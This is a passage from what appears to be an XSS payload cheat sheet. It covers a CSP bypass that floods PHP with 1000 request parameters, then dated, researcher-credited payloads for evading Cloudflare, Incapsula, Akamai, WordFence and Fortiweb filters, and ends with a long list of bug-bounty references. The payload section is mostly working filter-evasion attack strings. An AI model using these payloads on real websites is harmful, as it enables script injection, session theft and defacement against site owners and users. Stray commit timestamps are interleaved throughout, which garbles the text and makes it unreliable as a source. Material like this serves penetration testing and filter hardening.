* CSP: `script-src https://google.com 'unsafe-inline';`
**Payload**:
```javascript
"/><script>alert(1);</script>
```
### Bypass CSP header sent by PHP
**Requirements**:
* CSP sent by PHP `header()` function
**Payload**:
In default `php:apache` image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine.
Here are several ways to generate a warning:
- 1000 $_GET parameters
- 1000 $_POST parameters
- 20 $_FILES
If the **Warning** are configured to be displayed you should get these:
* **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0`
* **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2`
```ps1
GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
```
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
2018-06-27 18:00:17 +00:00
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
2021-07-15 05:48:02 +00:00
#### 25st January 2021
```html
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```
#### 21st April 2020
```html
<svg/OnLoad="`${prompt``}`">
```
#### 22nd August 2019
```html
<svg/onload=%26nbsp;alert`bohdan`+
```
#### 5th June 2019
```html
1'"><img/src/onerror=.1|alert``>
```
#### 3rd June 2019
```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```
### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)
```
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
```
### Cloudflare XSS Bypass - 27th February 2018
2019-03-01 16:49:19 +00:00
```html
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
```
### Chrome Auditor - 9th August 2018
2018-08-12 21:30:22 +00:00
```javascript
</script><svg><script>alert(1)-%26apos%3B
```
2018-08-12 21:30:22 +00:00
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
2016-11-11 09:03:35 +00:00
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018
2018-09-21 16:44:32 +00:00
```javascript
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019
```html
<svg onload\r\n=$.globalEval("al"+"ert()");>
```
2019-01-10 21:36:30 +00:00
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018
2018-10-29 21:22:10 +00:00
```html
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018
2018-09-21 16:44:32 +00:00
```javascript
<a href=javas&#99;ript:alert(1)>
```
2020-06-09 15:35:32 +00:00
### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019
```javascript
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```
2022-10-02 06:13:01 +00:00
## Labs
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
- tbm
- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
2022-10-27 01:36:15 +00:00
- [RPO Gadget - innerthmtl](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/)
- [Relative Path Overwrite - Detectify](https://support.detectify.com/support/solutions/articles/48001048955-relative-path-overwrite)
2018-08-13 10:01:13 +00:00
- [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)
- [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)
- [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
2022-10-27 01:36:15 +00:00
- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://www.buaq.net/go-25883.html)
2018-08-13 10:01:13 +00:00
- [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
- [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach
2022-10-27 01:36:15 +00:00
- [RPO that lead to information leakage in Google](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/) by filedescriptor
2020-09-05 08:36:58 +00:00
- [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
- [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S
- [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO
- [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax)
- [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy
- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa
- [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen
- [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz
- [IE & Edge URL parsing Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify
- [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html)
- [Microsoft XSS and Twitter XSS](https://wesecureapp.com/blog/xss-by-tossing-cookies/)
- [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans
- [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
- [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
- [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
- [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/)
- [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy
- [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard
- [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard
- [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form)
- [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy
- [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html)
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow
2020-09-05 08:36:58 +00:00
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett
- [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html)
2019-08-03 21:22:14 +00:00
- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
- [postMessage XSS Bypass](https://hackerone.com/reports/231053)
- [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin
- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans
2020-09-05 08:36:58 +00:00
- [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/)
- [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen
- [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179)
2020-09-05 08:36:58 +00:00
- [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov
- [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html)
2020-09-05 08:36:58 +00:00
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
2019-08-28 17:56:55 +00:00
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
2019-11-06 17:32:29 +00:00
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
2020-05-06 18:27:55 +00:00
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
2020-06-17 07:12:26 +00:00
- [Bypass < with ](https://hackerone.com/reports/639684)
- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)